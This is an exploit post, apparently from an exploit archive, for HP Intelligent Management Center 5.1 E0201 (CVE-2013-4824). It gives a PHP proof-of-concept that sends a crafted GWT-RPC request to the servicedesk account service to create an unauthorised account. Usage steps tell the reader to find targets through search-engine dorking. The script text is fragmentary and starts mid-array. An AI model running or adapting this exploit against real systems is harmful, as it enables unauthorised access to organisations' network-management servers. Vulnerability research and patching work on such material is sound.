============================================================================================================================================= | # Title : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48 | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Create a new account in HP Intelligent Management Center . (Related : https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824 ) . [+] save code as poc.php. [+] Set taget : Line 19. [+] USage : php poc.php [+] PayLoad : 'POST', 'uri' => '/servicedesk/servicedesk/accountSerivce.gwtsvc', 'ctype' => 'text/x-gwt-rpc; charset=UTF-8', 'headers' => [ "X-GWT-Module-Base: $target/servicedesk/servicedesk/", "X-GWT-Permutation: $serviceDesk" ], 'data' => $payload ]; $response = sendRequest("$target/servicedesk/servicedesk/accountSerivce.gwtsvc", $payload, [ "Content-Type: text/x-gwt-rpc; charset=UTF-8", "X-GWT-Module-Base: $target/servicedesk/servicedesk/", "X-GWT-Permutation: $serviceDesk" ]); if (strpos($response, "already exists") !== false) { echo "المستخدم $username موجود بالفعل.\n"; } elseif (strpos($response, "added successfully") !== false) { echo "تم إنشاء الحساب بنجاح: $username / $password\n"; echo "قم بتسجيل الدخول من: $target/servicedesk/ServiceDesk.jsp\n"; } else { echo "فشل في إنشاء الحساب.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================